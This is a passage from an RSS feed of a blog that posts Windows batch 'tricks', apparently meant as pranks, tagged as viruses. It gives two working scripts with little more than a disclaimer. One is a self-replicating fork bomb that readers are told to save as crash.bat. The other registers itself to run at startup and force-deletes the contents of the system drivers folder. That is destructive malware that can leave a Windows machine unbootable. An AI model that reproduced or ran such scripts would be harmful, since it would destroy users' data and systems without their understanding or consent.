&lt;div style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: -webkit-auto;"&gt;&lt;/div&gt;&lt;div dir="ltr" style="color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3mr3psEpsRnXM6nMl8ccQlYDXxCepChWFywe-5wHTvb2NS7RMQs_ZsYCdYMDochLNAgpmndGa32gCwR5dyAXgUcSyV9T29Qxis4-Jm_lBJoZdCAtlZTegwBAyJIMiuhznPdJQqELgMxA/s1600/ComputerCrash.jpg" imageanchor="1" style="background-color: white; color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3mr3psEpsRnXM6nMl8ccQlYDXxCepChWFywe-5wHTvb2NS7RMQs_ZsYCdYMDochLNAgpmndGa32gCwR5dyAXgUcSyV9T29Qxis4-Jm_lBJoZdCAtlZTegwBAyJIMiuhznPdJQqELgMxA/s200/ComputerCrash.jpg" style="border: 0px solid rgb(114, 242, 242); margin: 1em;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote style="background-color: #fce0b1; background-position: 0% 0%; border: 1px solid rgb(249, 195, 103); color: #151009; font-family: Georgia, 'Times New Roman', Times, serif; margin: 10px 10px 10px 50px; padding: 5px 5px 5px 37px;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace; font-weight: bold; line-height: 18px;"&gt;rem ---------------------------------&lt;br /&gt;
rem Crash Computer&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;br /&gt;
echo start "" %0&amp;gt;&amp;gt;crash.bat&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
Write the above code in notepad, and save it as crash.bat&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3mr3psEpsRnXM6nMl8ccQlYDXxCepChWFywe-5wHTvb2NS7RMQs_ZsYCdYMDochLNAgpmndGa32gCwR5dyAXgUcSyV9T29Qxis4-Jm_lBJoZdCAtlZTegwBAyJIMiuhznPdJQqELgMxA/s72-c/ComputerCrash.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Blue screen of death</title><link>http://latest-cracker.blogspot.com/2012/06/blue-screen-of-death.html</link><category>tricks</category><category>virus</category><pubDate>Tue, 5 Jun 2012 10:10:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-2563778850832828473</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNXe2ZVEKzCpOpXIgJ1B9WwRkx-Xy9CArc_bOa_UqUh9_XP1SNYVFr_os6uDq9DVNIvTc0ibU9MRF2aQactVyRZlz7Qw0kqcimMclHKZ0GNsHmPQG82dhF9Qu6aOSRwqsb9M3AF5HcaKc/s1600/blue+screen+of+death.bmp" imageanchor="1" style="background-color: white; color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNXe2ZVEKzCpOpXIgJ1B9WwRkx-Xy9CArc_bOa_UqUh9_XP1SNYVFr_os6uDq9DVNIvTc0ibU9MRF2aQactVyRZlz7Qw0kqcimMclHKZ0GNsHmPQG82dhF9Qu6aOSRwqsb9M3AF5HcaKc/s200/blue+screen+of+death.bmp" style="border: 0px solid rgb(114, 242, 242); margin: 1em;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote style="background-color: #fce0b1; background-image: url(https://sites.google.com/site/techbyte4u/PostQuote.png); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 1px solid rgb(249, 195, 103); color: #151009; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; margin: 10px 10px 10px 50px; padding: 5px 5px 5px 37px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: Monaco, Consolas, Courier, monospace; font-weight: bold;"&gt;rem ---------------------------------&lt;br /&gt;
rem Activate Blue Screen Of Death&lt;br /&gt;
@((( Echo Off &amp;gt; Nul ) &amp;amp; Break Off )&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;@Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;@Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f &amp;gt; Nul&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;@Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*"&lt;br /&gt;
)&lt;br /&gt;
rem --------------------------------&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]&lt;/span&gt;&lt;span style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt; &lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNXe2ZVEKzCpOpXIgJ1B9WwRkx-Xy9CArc_bOa_UqUh9_XP1SNYVFr_os6uDq9DVNIvTc0ibU9MRF2aQactVyRZlz7Qw0kqcimMclHKZ0GNsHmPQG82dhF9Qu6aOSRwqsb9M3AF5HcaKc/s72-c/blue+screen+of+death.bmp" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item></channel></rss>